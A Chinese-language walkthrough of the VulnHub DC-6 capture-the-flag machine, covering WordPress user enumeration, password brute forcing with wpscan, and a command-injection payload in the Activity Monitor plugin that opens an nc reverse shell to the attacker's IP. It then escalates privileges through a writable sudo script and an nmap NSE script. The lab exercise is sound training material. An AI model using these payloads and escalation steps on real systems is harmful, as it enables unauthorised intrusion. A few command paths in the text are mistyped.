DC-6靶机渗透测试

DC-6靶机

信息收集

1. 通过对靶机进行扫描，得出IP地址为192.168.78.134，开放端口为80 和 22 ssh，肯定会进行ssh连接的了

2. 访问网站，发现打不不开。根据nmap扫描和url提示，应该是需要添加域名wordy。修改/etc/hosts文件，添加主机192.168.78.134 wordy。
   

3. 观看网站很明显优势wordpress框架，对网站进行扫描

web渗透

1. 获取了网站后台登录界面，继续生成可以利用得账号和密码

2. 使用wpscan --url wordy -e u，使用wpscan工具对wordpress网站扫描获取WordPress可以登录的用户

3. 使用cewl wordy -w DC5pd.txt 使用之前使用的cewl工具生成该网站的登录密码。

4. 发现不能进行登录，重新打开https://www.vulnhub.com/entry/dc-6,315/，查看给的提示，获取密码字典的生成方式

OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > DC5pd.txt    That should save you a few years. ;-)

将/usr/share/wordlists下的rockyou.txt.gz解压缩，然后使用上面的语句，将rockyou转移到home/wfx文件夹内

5. 使用命令wpscan --url wordy -U DC5user.txt -P DC5pd.txt,使用wpscan工具对后台登录进行爆破登录，获取登录账密

6. 成功获取登录密码 mark 和 helpdesk01，进行后台登录

权限获取

1. 突然多出来个小插件，发现一个插件Activity monitor，猜测这个插件存在漏洞，那就去找一找是否存在可以利用的漏洞，发现还真有，攻击一下试试。

2. 经过测试，发现msf并不能成功的利用该漏洞，尝试使用searchsploit去搜索相关的漏洞利用EXP
   

权限获取方式1 – 利用45274.html

1. 将漏洞利用文件保存到桌面，查看文件内容修改成自己的IP地址

searchsploit -m 45274.html
vim 45274.html
#在箭头1修改为域名地址
#箭头2修改为kali反弹shell命令
<html>
    <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc -e /bin/bash 192.168.78.128 7777" />
</html> 

2. 将该html文件移动到unbantu的网站下

sudo service apache2 start  启动阿帕奇服务
cp 1.html /var/www/html/poc/a.html

3. 登录乌邦图的网站查看该网页

4. 点击之后提交按钮，需要先进行登录操作，再重新登一下wordpress的后台，获取cookie

5. 点击提交之前，乌邦图主机需要监听本地7777端口，等待shell反弹 nc -lvp 7777,提交之后发现成功返回shell

#反弹shell成功，转换交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
/usr/bin/script -qc /bin/bash /dev/null

权限获取方式2 – 利用50110.py

1. 先将文件EXP文件保存到桌面
   
2. 直接执行EXP文件，根据提示输入IP，登陆的用户名和密码，直接返回了www-data的用户shell。直接EXP一把梭，比上面简单许多了
   
3. 尝试反弹shell到本地主机上
   

权限提升

1. 开始进行文件搜索，来到home文件夹内，发现了几个文件夹，其中mark中有graham用户名和密码

ls
cd /home
cd /home/mark
ls
cd stuff
cat *.txt
su - graham
输入密码  登陆到了garaham用户

2. 查看当前用户权限，sudo -l 发现jens可以不需要密码执行backips.sh，那就使用sudo -u jens命令，就是使用jens来执行这个sh文件，前提先写入内容到sh文件夹内，写入/bin/bash，这样子使用jens用户执行该文件，就会得到jens的shell

sudo -l
	(jens) NOPASSWD: /home/jens/backups.sh
echo "/bin/bash">>/jens/backups.sh 
sudo -u jens /home/jens/backups.sh

3. 再次查看jens用户权限，发现可疑root权限免密使用nmap，这就要找到nmap漏洞了，其中nmap有–script=文件名 可以执行本地文件来进行漏洞扫描，所以可以在文件中写入获取shell操作，经过执行来获取root权限的shell

sudo -l
	(root) NOPASSWD: /usr/bin/nmap
cd /home/jens
echo "os.execute('/bin/bash')">>a.nse  //写入获取shell的命令
sudo /usr/home/nmap --script=a.nse

4. 获取了root权限，就可以来到root目录下，查看当前文件夹内容了，成功打开了flag文件，成功完成DC-6靶机